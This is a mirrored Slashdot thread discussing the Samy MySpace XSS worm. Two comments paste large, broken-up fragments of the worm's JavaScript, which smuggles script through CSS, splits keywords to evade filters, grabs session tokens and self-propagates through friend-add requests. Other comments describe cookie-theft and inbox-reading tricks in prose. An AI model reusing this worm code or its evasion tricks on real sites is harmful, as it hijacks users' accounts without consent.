Slashdot Mirror
Cross-Site Scripting Worm Floods MySpace
DJ_Vegas writes "One clever MySpace user looking to expand his buddy list recently figured out how to force others to become his friend, and ended up creating the first self-propagating cross-site scripting (XSS) worm. In less than 24 hours, 'Samy' had amassed over 1 million friends on the popular online community. According to BetaNews, the worm's code utilized XMLHTTPRequest - a JavaScript object used in AJAX Web applications and was spreading at a rate of 1,000 users every few seconds before MySpace shut down its site. Thankfully, the script was written for fun and didn't try to take advantage of unpatched security holes in IE to create a massive MySpace botnet."
omg frist p0st!
Awesome. Only about a week late. Heard it on a podcast monday. Goodbye slashdot, you are always late and have reached official sucktivity.
Is it really XSS if it's all happening at the same site? Just sayin.....
XMLHTTP has a same-site policy... the problem here is they let users render html & javascript in their own pages on the site. If slashdot allowed executable javascript in the comments, we'd have the same problem.
Is this the first AJAX vulnerability? Something like this would be expected in any new-ish tech that is increasing in popularity.
Myspace was out for a bit? Now you've REALLY given those emo kids something to cry about.
Roses are red
Violets are blue
I love you more
than my CPU!
I've got a Myspace page, because it's the most convenient way to keep in touch with some of my old classmates. I've often thought about how few practical applications these kinds of 'social networking' sites provide, aside from general time-wasting. I've also scoffed at the number of young kids who have thousands of friends, as if it's the high school popularity contest in digital form.
./ers have insight as to what kind of malicious applications his XSS could be used for, I welcome the opportunity to learn. Also, what exactly IS XSS? Cross-site (to me) indicates that the script performs a function across multiple webpages... would this refer to all the peers in the Myspace cluster?
So this guy found a way to win the popularity contest. I scoff at him too, though at the same time I must laud him for his creativity. If other
May the threads progress competently.
Go Samy! We're rooting for you over at EFnet #olsentwins!@
If you want to be seen, stand up. If you want to be heard, speak up. If you want to be respected, sit down and shut up.
Here is a recent paper on XSS viruses. Also there is an analysis of the specific MySpace worm.
Evidently LiveJournal and other sites take care to scrub out JavaScript in user-provided web pages, but the rumors are that sometimes people do figure out how to obfuscate their HTML enough to deliver the payload, despite the scrubbers.
And to think that, back in the day, people made friends by actually talking to other people.
And people still leave it enabled in absurd situations like this. Hopefully MySpace and the other journal-esque sites who still have javascript enabled get a clue. While their poor security only affected themselves this time, someone with more malicious intent could easily take advantage of this for alot more destructive actions than merely viral friendmaking.
He'll probably get a lot of job offers from this.
Subverting MySpace to create 1,000 friends per second? Obviously a terrorist. Send him to Gitmo!
So ... MS invents XMLHttpRequest ...
what's logically to follow with *any* new technology MS invents? Here's for hoping that their "magic touch" will end here.
random underscore blankspace at ya know hoo dot comedy.
In the past, I've been of mixed feelings with IE correctly rendering the "intent" of a web-designer when the web-designer has created buggy HTML - this includes such things as omitting terminating tags (e.g., <l\li>) as well as a few other things. The result of IE doing this was that some web pages look good in IE that didn't look good in other browsers - thus encouraging more people to use IE. As HTML was being used more and more by the masses, there seemed some logic to this. Of course, one of the problems with this idea is that the designers were looking at their web-pages in IE to see if their code was written correctly.
This story just goes to emphasize the importance of calling buggy HTML code what it is, and not trying to infer the intent of the HTML coder. Samy cleverly found a way to make "buggy code" that would get past MySpace's filter, but that would be rendered the way he intended by the browser with the majority market share.
Ben Hocking
Need a professional organizer?
Here is his explanation -- it goes over the transformations he had to make to the program to smuggle it past Myspace's filters.
And here is his version of the story.
He comes off as a sweet practical joker. But maybe that's just b.s. that he cooked up after he realized he might have some 'splainin' to do.
Also, his site really is "namb.la" -- he's making some sort of joke at NAMBDLA's expense, which is pretty suspect, I think.
http://www.thebricktestament.com/the_law/when_to_
... it shouldn't be surprising that someone took it literally and tried to claim it all for himself.
EricWilliam Shatner boldly goes like no man has before
The scoop from himself: http://fast.info/myspace/
This was bound to happen sooner or later, as MySpace repeats the history of the internet. Just look at the huge number of practically unreadable webpages with different size fonts and different colours, terribly innappropriate background images. Oh, and a load of commercial interests trying to stuff things down our throats. Loads of chicks though... ;)
Turns out that he just used the fact that (not trying to start a flame war here) IE and some versions of Safari allow javascript tags within CSS.
Samy's info on the topic (coral)
His explanation of how it works
And the phrase for self-replicating viruses was "gossip". Unfortunately, the viruses would occasionally replicate with mutations, but this only made them stronger.
Ben Hocking
Need a professional organizer?
Ha.. It is funny. The author *had* to bring "IE" into the discussion. Maybe it is his way to make sure that his submission is approved. Since we all know how the firefox fanboys here tend to believe that firefox is so safe, l33t and k3wl than IE.
Clearly, Google is the next Microsoft.
"Never attribute to malice that which can be adequately explained by stupidity." -- Hanlon's Razor
Didn't they use quoting?t tacks
Maybe next time they might want to look here:
http://shiflett.org/articles/foiling-cross-site-a
He who knows best knows how little he knows. - Thomas Jefferson
How are you gonna make a million friends a day that way? Progress, my boy, progress!
There are actually clever MySpace users? Wow, I'm shocked! What's next? People at Match.com without STDs?
Cross-site scripting is a family of vulnerabilities that share these attributes: a) a web-site that takes and displays text (e.g. Slashdot allows you to post comments) and b) a web browser that processes javascript in webpages.
The exploit involves placing javascript code into your posting on a website, such that when other people visit the website their browsers download your comment with the embedded javascript, which is then processed. The javascript, because it is being processed on your machine as part of the rendering of the page, can be used to exploit all sorts of vulnerabilities within browsers. When you have browsers tightly coupled with operating systems, this can open up some rather scary scenarios.
In this case, the guy just used the vulnerability to make some relatively benign changes, but he could have just as easily exploited some of the many problems with IE to be more malicious.
Left shift 1 for e-mail...
Everyone knows that XMLHttpRequest isn't secure. Where do we go from here? Is there a way to force the object to use SSL? Is there too much overhead in encrypting and decrypting the XML data with Blowfish or another algorithm?
All your friends...All your friends...All your friends are belong to us. Its the mega-happy-funtime disco hit of 2005!
They don't have javascript enabled. As far as I can tell, he just used IE's magical ability to run broken code so that the browser would be able to piece together the mess he used, but Myspace wouldnt be able to tell it was javascript.
The Braying and Neighing of Barnyard Animals Follows.
I don't care how he got the javascript to load. The fact of the matter is he got it to load. While it's Microsoft's fault for shipping a faulty browser, it's still the website's fault for not properly filtering. You can't just block the words "Javascript" and "Script" and call it good.
The source and the explanation.
Here is a link to the blog entry the article mentions that contains the code of the worm. (From Evan Martin of Google)
...I think I definitely want to be his buddy. :)
Wait, there are unpatched security holes in IE? From all I've heard lately, it's way more secure than Firefox. How could Microsoft let this happen????
Thankfully, the script was written for fun and didn't try to take advantage of unpatched security holes in IE to create a massive MySpace botnet.
:-)
"Thankfully"? Isn't that what we want? I mean...not so much the botnet, but more the whole MySpace-being-nuked thing.
In a collective mass, millions of overly pale, and under-educated emo kids could be heard to scream as their only hope of getting laid timed out.
Myspace, The AOL for 2005!
I browse with javascript disabled and have for 5 years, it immunises me against the majority of browser exploits. You can't stop morons running embeded script but webmasters can at least make sure their site works for that 5% of us with a clue. For more complex webapps, they can provide the security concious with an alternate signed tarball or browser extension (that doesn't load/eval() script from remote servers).
after perusing his site, i happened to notice this in the comments on one of the pages...
l ace('+','%2B')}while(Q.indexOf('&')!=-1){Q=Q.repla ce('&','%26')}N+=P+'='+Q;O++}return N}function httpSend(BH,BI,BJ,BK){if(!J){return false}eval('J.onr'+'eadystatechange=BI');J.open(BJ ,BH,true);if(BJ=='POST'){J.setRequestHeader('Conte nt-Type','application/x-www-form-urlencoded');J.se tRequestHeader('Content-Length',BK.length)}J.send( BK);return true}function findIn(BF,BB,BC){var R=BF.indexOf(BB)+BB.length;var S=BF.substring(R,R+1024);return S.substring(0,S.indexOf(BC))}function getHiddenParameter(BF,BG){return findIn(BF,'name='+B+BG+B+' value='+B,B)}function getFromURL(BF,BG){var T;if(BG=='Mytoken'){T=B}else{T='&'}var U=BG+'=';var V=BF.indexOf(U)+U.length;var W=BF.substring(V,V+1024);var X=W.indexOf(T);var Y=W.substring(0,X);return Y}function getXMLObj(){var Z=false;if(window.XMLHttpRequest){try{Z=new XMLHttpRequest()}catch(e){Z=false}}else if(window.ActiveXObject){try{Z=new ActiveXObject('Msxml2.XMLHTTP')}catch(e){try{Z=new ActiveXObject('Microsoft.XMLHTTP')}catch(e){Z=fals e}}}return Z}var AA=g();var AB=AA.indexOf('m'+'ycode');var AC=AA.substring(AB,AB+4096);var AD=AC.indexOf('D'+'IV');var AE=AC.substring(0,AD);var AF;if(AE){AE=AE.replace('jav'+'a',A+'jav'+'a');AE= AE.replace('exp'+'r)','exp'+'r)'+A);AF=' but most of all, samy is my hero. '}var AG;function getHome(){if(J.readyState!=4){return}var AU=J.responseText;AG=findIn(AU,'P'+'rofileHeroes', '');AG=AG.substring(61,AG.length);if(AG.indexOf('s amy')==-1){if(AF){AG+=AF;var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['interestLabel']='heroes';AS['submit']= 'Preview';AS['interest']=AG;J=getXMLObj();httpSend ('/index.cfm?fuseaction=profile.previewInterests&M ytoken='+AR,postHero,'POST',paramsToString(AS))}}} function postHero(){if(J.readyState!=4){return}var AU=J.responseText;var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['interestLabel']='heroes';AS['submit']= 'Submit';AS['interest']=AG;AS['hash']=getHiddenPar ameter(AU,'hash');httpSend('/index.cfm?fuseaction= profile.processInterests&Mytoken='+AR,nothing,'POS T',paramsToString(AS))}function main(){var AN=getClientFID();var BH='/index.cfm?fuseaction=user.viewProfile&friendI D='+AN+'&Mytoken='+L;J=getXMLObj();httpSend(BH,get Home,'GET');xmlhttp2=getXMLObj();httpSend2('/index .cfm?fuseaction=invite.addfriend_verify&friendID=1 1851658&Mytoken='+L,processxForm,'GET')}function processxForm(){if(xmlhttp2.readyState!=4){return}v ar AU=xmlhttp2.responseText;var AQ=getHiddenParameter(AU,'hashcode');var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['hashcode']=AQ;AS['friendID']='11851658 ';AS['submit']='Add to Friends';httpSend2('/index.cfm?fuseaction=invite.a ddFriendsProcess&Mytoken='+AR,nothing,'POST',param sToString(AS))}function httpSend2(BH,BI,BJ,BK){if(!xmlhttp2){return false}eval('xmlhttp2.onr'+'eadystatechange=BI');xm lhttp2.open(BJ,BH,true);if(BJ=='POST'){xmlhttp2.se tRequestHeader('Content-Type','application/x-www-f orm-urlencoded');xmlhttp2.setRequestHeader('Conten t-Length',BK.length)}xmlhttp2.send(BK);return true}">
;)
0){N+='&'}var Q=escape(AV[P]);while(Q.indexOf('+')!=-1){Q=Q.rep
wonder what it is
members' creative from nOw on o8 non-fucking-existant. declined in market who are intersted
This is a test of the JS exploit.
Who didn't know that place was full of STDs? (Script Transmitted Diseases)
OddManIn: A Game of guns and game theory.
Sorry, Firefox doesn't execute script from within CSS files.
You can read the (entertaining) description of the hack in his own words here:
Samy is my hero
My proposed "quick and dirty" solution is this.
..... Don't say you weren't warned.");
<script type="text/javascript">
for (i = 0; i < 1000; ++i) {
alert("Disable JavaScript for this site!");
};
alert("OK
</script>
Now you can be sure that {almost*} nobody visiting your site has JavaScript enabled, so there is no chance of this affecting them.
* There probably is _somebody_ _somewhere_ who really is masochistic enough to click the thing 1001 times. Their computer probably is infected with several viruses already, though.
Je fume. Tu fumes. Nous fûmes!
No, actually my pinky finger slipped and hit the "l" instead of the ";". I won't even try to explain how such a slip is possible as my other finger should have been in the way. I think I'm gonna blame quantum tunneling.
Ben Hocking
Need a professional organizer?
1. Embedded music videos. Anyone have a host list of the music video providers? I'd like to resolve them to 127.0.0.1
2. Bogus accounts. There is a huge rash of "stripper" accounts, consisting of minimal user info, that messages out to single guys to get them to email them at their yahoo accounts. They typically have 4 or 5 risque pictures, making everyone think all women are whores. Bad bad bad.
3. Myspace needs a "safe mode" where the excessively bad(bells and whistles) profiles that sodomize any web browser can be avoided.
4. Why does clicking to one of your groups have to open in a new window? WHY? The top-bar navigation makes that un-neccessary.
But still, myspace is better than orkut. People actually use myspace.
same year, BSD W?oRds, don't get conglomerate in the
My Space: For child Molesters and the children the molest! ...ala is anyone surprised?
See Sig! See Sig Zig! Zig Sig Zig!!!!!
right? They're not just going to hire someone who figured out how to bypass a filter. That's not brilliant design by any means.
Since I know only about 12 programming languages and use maybe 10 libraries between them all, that makes me next to computer illiterate these days. So I didn't know what XSS was, but found this site: http://www.cgisecurity.com/articles/xss-faq.shtml extremely informative. Including some HEX code that looks like fun!
This is, by deifnition, not a cross site scripting vulnerability, since all the requests were confined to the MySpace.com domain.
In fact, I don't see how anyone who even read the article could conclude that it was XSS. There isn't even a vulnerability in the browser being epxloited here, it is just vulnerabilities in the MySpace.com software.
XSS vulnerabilities are much worse than this. If this guy had tried to use XMLHttpRequest to access a site off of MySpace.com, he would find that all it would result in is raising a security exception. XSS vulnerabilities use holes in browsers to get around this, allowing data to flow from one website to another without the user's knowledge. That is dangerous.
Will developers ever understand that downloadable code can NEVER be secure?
Years ago developers who used mainframes with greenscreens (which have the capability of executable client-side code in some cases) concluded that security was impossible two decades ago; furthermore academicians have proven that secure downloadable code is impossible.
Today we have idiots re-creating the problem in a browser (a much more volatile and less secure environment) with JavaScript, AJAX and XMLHTTPRequest.
awhile back all my younger friends started bugging me to get a myspace profile. I took one look at the site, first thought was "crap design" (I'm a web/db dev), second thought was "superficial", closed window. I was just appalled at how bad it looked (despite still visiting Slashdot every day... hehe)
All I can surmise is that the person who designed this worm is far more clever than any of the people who designed MySpace.
I still don't have a profile on it...
Actually, I think that if IE became more strict it would require them to learn a little more about how HTML is designed to work. It should make them more employable, not less. Of course, this is similar to Nietzsche's "That which does not kill me, makes me stronger" and it's corrollary, "Yeah, but that which does kill me..."
Ben Hocking
Need a professional organizer?
Well, yeah. Um, about that. You see, well, it oughta. It just oughta.
But seriously, I think there are other examples where IE does allow incorrect HTML, but now my credibility is just shot. :P
Ben Hocking
Need a professional organizer?
I found a similar exploit (force people to add you) back when they were allowing Javascript in your profile. MySpace has always been really insecure, mainly because of their stupid design decision to allow users to use more than basic HTML. They allowed Javascript at first, thinking they'd be able to filter out anything malicious. They soon realized that was stupid and filtered out Javascript. Turns out there was a way to slip it in through CSS (granted only for IE). I'm not surprised.
Also, when they originally disabled Javascript, they didn't go through everyone's profile and re-filter it. So there are still people using Javascript hacks that just haven't updated their profile, so the hack remains in place. For example, there is a way to read someone's cookie and send it somewhere, thus making it possible to see who visits your profile (and maybe something more malicious).
Zoot!
That would be a good addition, maybe we could that run our own banners to promote your own favourable comments. Flamebaits/bad ratings would hurt earnings, and since (almost) everybody likes earnings, it would improve the quality of the comments to an unprecedented level.
My guess about the moderation on this comment in a javascript & graphics allowed comment environment: -1 (Redundant)
My wife's sketchblog Blob[p]: Gastrono-me
This doesn't work on slashdot. /.-posts some years ago (pop-up & goatse redirect on mouseover) about 2 (?) years ago but it was fixed veeeerry fast.
Someone figured out to execute javascript in a div-tag in
Firstly it's on the same site :).
/>
Advogato (mod_virgule) was vulnerable to this sort of thing before (back in 2002). Won't be surprised if there were others too.
Anyway, I've proposed years ago that there be HTML tags to turn off any active/dynamic stuff.
Currently the HTML situation is like only being able to turn off the lights by going to dozens of switches one by one and turning them off. There is no main power switch to turn ALL the lights off, or even groups of lights off.
I guess it's just me who thinks that the HTML equivalent of a "Big Red OFF" switch would be useful.
e.g.
<shieldson lock="randomstring" allowed="keyword,keyword,keyword"
disallowed material disabled
<shieldsoff lock="randomstring"/>
state restored to before lock
Where keywords:
textonly = just text
basic = basic formatting <em> <b> <i> <strong>
tables = tables
urls= plain <a href=""> no javascript etc
images= plain images, no javascript etc.
java=java
javascript=javascript.
The idea is it will be very hard for the attacker to guess the random string.
Oh well...
I did this. They were more lenient with the javascript back then. You had to use escape characters, but it was no big deal. I wrote a self-propagating worm that changed a user's name to the source of my script. Then I inserted that code into my name. Everyone on myspace had their name changed to 'lupidvirus' after about 6 hours. I got a call from their lawyers the next day at work.
Mine propagated faster than this one because it didn't rely on profile views. Anytime you saw the name, whether it be in a comment, profile, or search, you would be infected. However, with the script executing 100 times per page view, myspace's servers quickly became overloaded and crashed (I didn't really expect it to work). I also essentially staged a DDoS attack against my web server which was hosting the script (it needed to be hosted in order to fit in the 'name' field).
Another note: myspace never removed the scripts that were saved before they outlawed javascript. To this day, I can read a user's inbox and sent messages when they view my profile. I also was going to write a DHTML roleplaying game that ran on myspace, but they locked that account because of the virus. It still plays music and lets you manipulate your inventory though =D
About a year ago, I discovered a bug in xanga.com's software that would allow anyone to use any javascript they wanted. Xanga simply made 1 pass through to remove any tags... so all you had to do was write <script> and </script>. I created a proof of concept that would allow me to capture a user's cookies and send them to an offsite PHP script, totally transparent to the victim. You could then simply replace the victim's cookie with yours, and have total control of their account.
So I took my discovery and emailed it to their designated bug report address. 5 months later it was finally fixed. I've found other vunerabilities that would allow anyone to do the same thing, but I don't even want to bother writing a proof of concept and telling them about it. Most companies just don't see XSS as a danger until someone wreaks some havoc.
Wow! Very clever! Before now (for me anyway) XSS has just been a "bug" rather than a "vulnerability" and apart from the odd phishing attack or sneaky password stealing i never really saw a practical appliance for it until now.
Oh, and just to get in the oblicatory M$ bashing session, who's fault was this entire thing?? MSIE!!! Owing to their clear disregard for HTML standards. MySpace (who never asked to be browsed by IE!) had to take their site offline because of the care-free people.
I leave you with this: If this is possible, what else is vulnerable to XSS+AJAX?
You feel sleepy. Close your eyes. The opinions stated above are yours. You cannot imagine why you ever felt otherwise.
This guy used the tag to insert the javascript which slashdot also allows. Not that I'm wanting anyone to do something evil with it but I'm wondering could slashdot be susceptable to the same flaw they're reporting?
So is MySpace.com going to bring criminal charges against this individual for creating and propagating malcode? Outright it may have done no damage, but they may be able to claim damages caused from shutdown and cleanup...
News Reporters Make Tasty Polar Bear Treats!
I believe it was called a spoon.
>>I bet he doesn't have over 1 million friends now.
No kidding. But look on the bright side -- he has dramatically increased his chances of having at least one *very* close, long-term friend. Bubba, meet your new cellmail, "Samy."
Cross Site Scripting
And the phrase for self-replicating viruses was "gossip". Unfortunately, the viruses would occasionally replicate with mutations, but this only made them stronger.
At my school, I think it was called "herpes".
Use a NON IE Browser. I enjoy firefox myself. Infact, with firefox, i block all those crappy embedded music videos people have 2934234092 on their profiles
After patching to fix this problem, MySpace now becomes the most immune to these types of attacks. Their software is more resistant, their team is more educated. To mix punchlines, pioneers get the arrows, but blows that do not break the back, strengthen it.
--
make install -not war
I wrote a Kuro5hin article documenting exactly this sort of problem some time ago. It's about Xanga, but it applies just as much to MySpace.
Didn't you see The Matrix?
... everyone will be your friend. Really...
Slashdot: stuff for news, nerds that matter, matter for news, stuff that nerd
I feel embarassed for the guy's cat. I never saw his webpage, but I only assume he had pictures of his cat on there. That cat probably doesn't even want to be seen in public now.
"Get back foo! You're invading MySpace!"
What, double the number of positive moderations?
A Gentleman would have posted the correction AC, but included his name as a signature.
Aside : Does anyone know of a comprehensive guide to slashtiquette?
LiveJournal's cleanhtml.pl already covers multiline splits in IE. It's not like IE's interpretation of single tags split on mutiple lines hasn't been known about for quite some time.
I completely agree that IE is the problem, but to say that this is something site administrators couldn't have been prepared for is untrue. To expect a self replicating javascript? No way. But to secure the filter to prevent multiline tags? Yes, cleanhtml.pl already does. It's known and out there already.
One clever MySpace user
Woudn't it be more accurate to say "THE clever MySpace user"?
Thanks to those idiots who are, despite all the warnings, still using the insecure Internet Explorer web browser instead of Firefox things like this happen. Sometimes you wonder how stupid some people can possible be and what this means to the human species as a whole.
I can see it now that this sounds like the plot for a Sci Fi movie. Guy inserts code into Myspace. Myspace then becomes conscious and starts rampaging across the internet, trying to get people to be its friends. If they don't, it bombards them with pictures of slashed wrists. Then some B movie actors like Gary Busey and John Rhys Davies have to "go into the internet" using some kind of virtual reality rig and kill Myspace. I've already pitched the idea. It'll be debuting next year.
would have been much more interesting on adultfriendfinder!
The open source site Advogato was hit by a similar profile-page-virus in 2002.
But it was a neat hack, and kudos to Samy!
There was a similar opportunity at http://www.mrfixititonline.com/ in 2001, since you could use javascript in your signatures. In their infinite wisdom, instead of fixing the hole, they made using signatures a subscription-only "gold" feature. Now that's a business model ;-)
I'm still trying to figure out what people mean by 'social skills' here.
When you have to write a script to get friends...
...I've still only got 4 myspace friends. *sighs*
This sig is false.
Robert Tappan Morris might be able to suggest some good lawyers.
I wrote an XSS filter based on TagSoup and SAX filters.
Taken from http://namb.la/popular/tech.html this is the exploit he used:
,BH,true);if(BJ=='POST'){J.setRequestHeader('Conte nt-Type','application/x-www-form-urlencoded');J.se tRequestHeader('Content-Length',BK.length)}J.send( BK);return true}function findIn(BF,BB,BC){var R=BF.indexOf(BB)+BB.length;var S=BF.substring(R,R+1024);return S.substring(0,S.indexOf(BC))}function getHiddenParameter(BF,BG){return findIn(BF,'name='+B+BG+B+' value='+B,B)}function getFromURL(BF,BG){var T;if(BG=='Mytoken'){T=B}else{T='&'}var U=BG+'=';var V=BF.indexOf(U)+U.length;var W=BF.substring(V,V+1024);var X=W.indexOf(T);var Y=W.substring(0,X);return Y}function getXMLObj(){var Z=false;if(window.XMLHttpRequest){try{Z=new XMLHttpRequest()}catch(e){Z=false}}else if(window.ActiveXObject){try{Z=new ActiveXObject('Msxml2.XMLHTTP')}catch(e){try{Z=new ActiveXObject('Microsoft.XMLHTTP')}catch(e){Z=fals e}}}return Z}var AA=g();var AB=AA.indexOf('m'+'ycode');var AC=AA.substring(AB,AB+4096);var AD=AC.indexOf('D'+'IV');var AE=AC.substring(0,AD);var AF;if(AE){AE=AE.replace('jav'+'a',A+'jav'+'a');AE= AE.replace('exp'+'r)','exp'+'r)'+A);AF=' but most of all, samy is my hero. <d'+'iv id='+AE+'D'+'IV>'}var AG;function getHome(){if(J.readyState!=4){return}var AU=J.responseText;AG=findIn(AU,'P'+'rofileHeroes', '</td>');AG=AG.substring(61,AG.length);if(AG.index Of('samy')==-1){if(AF){AG+=AF;var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['interestLabel']='heroes';AS['submit']= 'Preview';AS['interest']=AG;J=getXMLObj();httpSend ('/index.cfm?fuseaction=profile.previewInterests&M ytoken='+AR,postHero,'POST',paramsToString(AS))}}} function postHero(){if(J.readyState!=4){return}var AU=J.responseText;var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['interestLabel']='heroes';AS['submit']= 'Submit';AS['interest']=AG;AS['hash']=getHiddenPar ameter(AU,'hash');httpSend('/index.cfm?fuseaction= profile.processInterests&Mytoken='+AR,nothing,'POS T',paramsToString(AS))}function main(){var AN=getClientFID();var BH='/index.cfm?fuseaction=user.viewProfile&friendI D='+AN+'&Mytoken='+L;J=getXMLObj();httpSend(BH,get Home,'GET');xmlhttp2=getXMLObj();httpSend2('/index .cfm?fuseaction=invite.addfriend_verify&friendID=1 1851658&Mytoken='+L,processxForm,'GET')}function processxForm(){if
<div id=mycode style="BACKGROUND: url('java
script:eval(document.all.mycode.expr)')" expr="var B=String.fromCharCode(34);var A=String.fromCharCode(39);function g(){var C;try{var D=document.body.createTextRange();C=D.htmlText}cat ch(e){}if(C){return C}else{return eval('document.body.inne'+'rHTML')}}function getData(AU){M=getFromURL(AU,'friendID');L=getFromU RL(AU,'Mytoken')}function getQueryParams(){var E=document.location.search;var F=E.substring(1,E.length).split('&');var AS=new Array();for(var O=0;O<F.length;O++){var I=F[O].split('=');AS[I[0]]=I[1]}return AS}var J;var AS=getQueryParams();var L=AS['Mytoken'];var M=AS['friendID'];if(location.hostname=='profile.my space.com'){document.location='http://www.myspace. com'+location.pathname+location.search}else{if(!M) {getData(g())}main()}function getClientFID(){return findIn(g(),'up_launchIC( '+A,A)}function nothing(){}function paramsToString(AV){var N=new String();var O=0;for(var P in AV){if(O>0){N+='&'}var Q=escape(AV[P]);while(Q.indexOf('+')!=-1){Q=Q.repl ace('+','%2B')}while(Q.indexOf('&')!=-1){Q=Q.repla ce('&','%26')}N+=P+'='+Q;O++}return N}function httpSend(BH,BI,BJ,BK){if(!J){return false}eval('J.onr'+'eadystatechange=BI');J.open(BJ
...if it's hidden in Flash.
"Lead my skeptic sight."
From the horses's mouth:
http://namb.la/popular/tech.html
1 million foes ....
everyones got to have a dream and mine starts now
What if you were to convert it all to hex? wouldn't the Browser then execute the code after it formatted it from hex?
I hope he's One clever ex-MySpace user permanently.
"It's the height of ridiculousness to say for those 9 lines you get hundreds of millions."
Thankfully, the script was written for fun and didn't try
to take advantage of unpatched security holes in IE to create a massive MySpace botnet.
Yeah. That would've been a tragedy.
Tom did it first.
In Soviet Russia, your heros choose you!
Ah well, 1 offtopic post as a new user already hosed my karma, this post probably won't be seen by anyone anyway.
"It's hard to bargle nawdle zouss
With all these marbles in my mouth"
i don't even use myspace and i want myspace reading that comment. it's totally irresponsible that they bothered to disable javascript but didn't audit existing data for it. somebody claiming that in public with an identifiable name might get them off their asses.
it doesn't affect me for a variety of reasons, but the last thing anybody needs is another major security vulnerability for lots of people.
Just reading the article brought back a flood of memories of when I used to be a hardcore user of the site AsianAvenue, where I did many of the same things mentioned in the article. I also found out how to insert raw HTML in my profile, and how to automatically have anyone who visited by page become a "friend", although it wasn't self-propogating. I also knew how to have people automatically sign my guestbook also...
Fun times.
HA HA HA HA HA
/sorry
//thought this was fark
I think its fake. I use myspace A LOT. I probably browse 100+ profiles a day and I didnt get this worm, I have never even heard of it until a few days ago when I was linked to a page that the sammy guy wrote about it. I use IE, so all the scripting would have hit me and Ive never heard anyone on my buddy list bitching about it in a bulletin or some chain bulletin telling people to watch out for it. I see no proof behind it other than some guy saying he did it, and myspace being down for awhile. The thing is myspace is down all of the time, they have horrid backend code. I get random errors all the time and there is almost always atleast an hour of downtime every day.
myspace already has enough bugs in it, theres already several ways to get javascript working on that site. it just took a couple months for some guy willing enough to script somthing like this to figure that out, and i think its about time.
"A great democracy must be progressive or it will soon cease to be a great democracy." --Theodore Roosevelt
OK, I can somewhat defend the good intentions behind rendering poor html, but I'm going to have to go ahead and give you a rousing "Amen, brother!" on the FrontPage point.
Ben Hocking
Need a professional organizer?
Whenever someone says something about viral-scripting - I just paste the link into lynx (or links) and view it.
Quidquid latine dictum sit, altum videtur
http://www.zazzle.com/products/gallery/browse_resu lts.asp?searching=on&searching_search_columns=*&se arching_search_condition=samy
I choose not to believe that. I don't credit anyone with that much foresight. I think that, as usual, MS was just catering to the lowest common denominator ("No one ever went broke or lost a campaign by overestimating the public's stupidity"), and the side "benefits" you mentioned just happened by chance (well, not exactly chance, but you know what I mean). Sure, you can blame them for contributing to the glut of poorly written HTML, on at least two different levels, but I refuse to believe that their choice to render poor html was part of some vast Microsoft-wing conspiracy. ;)
Ben Hocking
Need a professional organizer?
Ok, i understand that he did this for laughs and all, i commend him for this only because it shows he is probably the only Myspace user on the network that would be able to pull this off, or else somebody else would have allready! But yet, why cause mischief and have a network have to go offline? yet i think if i was smart enough to pull this off i probably would have done the same!^_^ i mean im just starting out and learning about HTML and CSS! But also... it really peeves me that some of the articles said all of the networks users became a victem of this and other articles said a certain amount! Not all users and/or profile were affected by this! My profile was fine and was never took offline. But still kudos to "samy" for his achievements, i'm just a little baffled on a few things having to do with this!
"They stole my lie"
Actually, this wasn't "first self-propagating cross-site scripting (XSS) worm". This was second. First was written three months ago by Latvian hacker Lethal for Latvian Friendster-alike website Draugiem.lv. That worm was called Draugberts.